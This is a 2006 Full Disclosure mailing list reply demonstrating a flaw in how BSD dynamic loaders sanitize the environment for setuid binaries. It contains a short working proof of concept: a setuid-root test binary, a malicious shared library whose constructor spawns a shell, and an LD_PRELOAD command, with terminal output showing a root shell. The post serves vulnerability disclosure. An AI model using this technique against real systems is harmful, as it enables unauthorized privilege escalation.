Full Disclosure mailing list archives
Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
From: "Tyop?" <tyoptyop () gmail com>
Date: Wed, 22 Nov 2006 22:55:37 +0100
On 11/22/06, In Cognito <defend.the.world () gmail com> wrote:
Impact: Serious. May lead to privilege escalation. A class of security vulnerabilities has resurfaced in the dynamic loaders of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment variables for suid and sgid binaries. Due to either badly implemented sanitization or a lack of it, a setuid binary may execute other processes with a tainted environment. [...] Have fun! Stay safe!
Fun. Not "perfectly" safe. My experience : %id uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator) %cat vuln.c main() { setuid(0); execl("/usr/bin/id","id",0); } %cc vuln.c -o vuln && chmod 4711 ./vuln %exit
id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
ls -l vuln
-rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
cat tyop.c
__attribute__ ((constructor)) main() { printf("[+] Hello from shared library land\n"); execle("/bin/sh","sh",0,0); }
cc -shared -o lib.so tyop.c setenv LD_PRELOAD "/home/tyop/test/lib.so" ./vuln
[+] Hello from shared library land # id uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop) # echo "It works on `uname -sr`" It works on FreeBSD 7.0-CURRENT-200609 # Have a nice day. -- Tyop? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders. Tyop? (Nov 22)